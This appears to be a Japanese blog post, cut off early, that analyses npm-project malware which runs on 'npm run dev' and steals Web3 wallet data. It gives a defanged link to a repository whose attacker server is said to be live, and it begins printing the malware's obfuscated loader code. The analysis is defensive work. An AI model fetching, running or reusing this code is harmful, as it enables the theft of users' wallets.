Web3 のマルウェアが話題なので解析してみた

ARANK

はじめにnpm run dev すると悪意のあるコードが実行されてウォレット情報が抜かれるという記事が話題になっていたので、どういうコードが実行されているのか解析してみました。話題になっている記事の著者は、難読化されたコードを AI に投げて、Ethereum のウォレットが抜かれると説明していましたが、本当にそれだけなのか？ということを確認してみます。!注意この記事は、マルウェアの解析を目的としています。悪意のあるコードが含まれているため、本記事のコードを実行することはお勧めしません。マルウェアの入手まず、攻撃者側のサーバーが生きている同系統のマルウェアを入手しなければいけません。GitHub のコード検索機能で util.assets() というコードを検索してみると、見つかったので、こちらを使用します。!以下のリポジトリです。執筆時点でサーバーが生きているため、クローンすることはお勧めしません。https:[//]github[.]com/arsantin/cometec記事にあったような eval が確認できます。マルウェアの解析util.assets() を見てみます。var crypto = require("crypto"); module.exports = { assets: function () { return "public/models/.svn/bowe…